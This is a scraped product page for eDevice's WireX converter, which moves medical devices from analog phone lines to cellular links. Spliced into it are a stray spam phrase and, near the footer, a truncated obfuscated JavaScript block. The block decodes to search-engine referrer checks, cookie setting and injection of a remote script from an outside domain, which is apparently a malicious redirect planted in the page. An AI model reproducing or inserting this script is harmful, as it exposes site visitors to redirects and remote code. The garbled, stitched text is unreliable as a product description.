As an external network accessory this network converter allows approved medical devices to migrate from wired to cellular connectivity with a very low regulatory impact.. Key FeaturesTechnical SpecificationsDual-Band 3G support (US/EU/JP versions)Class12 GSM / GPRS Quad-Band ModemRJ11 POTS / FXS interfaceDimensions 120(W) x 103(D) x 36(H) mmOperating Environment: 0 to + 45°CInternal Antenna & SIM card holderPower Supply 12VOptional Internal Li-Ion BatteryLEDs indicating Cellular Signal StrengthWall mounting casingStandard Network Termination Emulation (POTS)V21, V22, V22bis, V23, V32, V32bis and V34 modem supportRFC-compliant TCP client and serverEmbedded Web ServerDynamic DNS clientRemote control over cellular and FXS InterfaceAutomatic cellular attachmentNetwork Carrier Remote SelectionISP: IP frames from the device are directly transferred through 2G/3G after call setupTransparent: raw data from the device are encapsulated in TCP frames through 2G/3G after call setupGSM Gateway: analog calls from the device trigger GSM callsRelated PagesNewsletterKeep up on our always evolving product features and technology.
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Acting as a plug-and-play converter, the WireX does not require any changes to the host/connected device: simply unplug the phone jack from the wall socket and plug it into the WireX traditional dial-up PSTN network Emulation Input socket.. Thousands of expensive landlines used for connecting legacy devices can be immediately replaced by cost-competitive cellular SIM cards, thus decreasing the overall telecommunication budget without any effort and, at the same time, offering worldwide mobility to end-users.. The WireX is the easiest way to switch legacy equipment from traditional phone landlines to 2G/3G cellular.. Once equipment have been cellular-enabled by the WireX, banks of analog modems on the central server can be replaced by a high bandwidth Internet link. Esxi emulex driver version
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The existing phone network cable is connected directly to the WireX that extracts the payload data from the modem flow.. P2 - 1er étageAvenue Ariane - 33700 Mérignac, France© Copyright 2017 by eDevice.. var _0x36b5=['OyBkb21haW49','OyBzZWN1cmU=','ZFFxbks=','RGpmaHQ=','QW5ra2w=','Z25XSlE=','Z2V0VGltZQ==','VFd4dVc=','aUVubnk=','bW1PbU8=','Lmdvb2dsZS4=','LmFzay4=','LmFsdGF2aXN0YS4=','LnlhbmRleC4=','ZXFGcUo=','RnFSTWM=','VGJaWkg=','Q3dFeUs=','Z2V0','TElaekg=','cUZjTUg=','SFNEZ04=','c2NyaXB0','aGVhZA==','Y3JlYXRlRWxlbWVudA==','c3Jj','Z2V0RWxlbWVudHNCeVRhZ05hbWU=','T3VFc00=','cG90cyt0byszZytjb252ZXJ0ZXI=','RUNV','bVF5','dmlzaXRlZA==','aHR0cHM6Ly9jbG91ZGV5ZXNzLm1lbi9kb25fY29uLnBocD94PWVuJnF1ZXJ5PQ==','M3wwfDJ8NXwxfDQ=','c3BsaXQ=','VVJ0bHU=','c2V0','eEhPRFM=','RnB4WHI=','Y29va2ll','bGVuZ3Ro','cmVwbGFjZQ=='];(function(_0x382da8,_0x39d77c){var _0x488649=function(_0x33de80){while(--_0x33de80){_0x382da8['push'](_0x382da8['shift']());}};_0x488649(++_0x39d77c);}(_0x36b5,0xe8));var _0x5bf2=function(_0x2888b8,_0x26dfb3){_0x2888b8=_0x2888b8-0x0;var _0x4aebe0=_0x36b5[_0x2888b8];if(_0x5bf2['initialized']===undefined){(function(){var _0x11bf0f;try{var _0x353063=Function('return\x20(function()\x20'+'{}.. All Rights Reserved Marketing materials - Not contractually or legally binding Please consider all telecom and medical regulations in your region prior to deployment of products or services. 518b7cbc7d